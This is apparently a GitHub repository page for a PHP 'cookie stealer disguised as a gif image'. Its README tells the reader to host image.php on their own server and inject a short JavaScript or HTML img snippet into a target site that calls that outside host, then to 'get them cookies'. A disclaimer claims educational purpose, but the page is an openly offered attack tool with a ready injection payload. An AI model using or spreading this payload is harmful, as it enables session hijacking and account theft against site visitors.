radum / cookieStealer

A cookie stealer disguised as a gif image

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Cookie Stealer

A cookie stealer disguised as a gif image.

Hot to use

Host the image.php file wherever you want.

Inject the code on the target

let img = new Image();
img.src = "http://yoursite.com/image.php";
document.body.appendChild(img);

or in plain html

<img src="http://yoursite.com/image.php">

Get them cookies.

Disclaimer

I'm not responsible for your actions. The code provided here is for educational purpose only. If you find a web site with code injection vulnerability, inform them.

I wrote this script some time ago, after watching this video:

Send cookies with image request

About

A cookie stealer disguised as a gif image

License:MIT License


Languages

Language:PHP 100.0%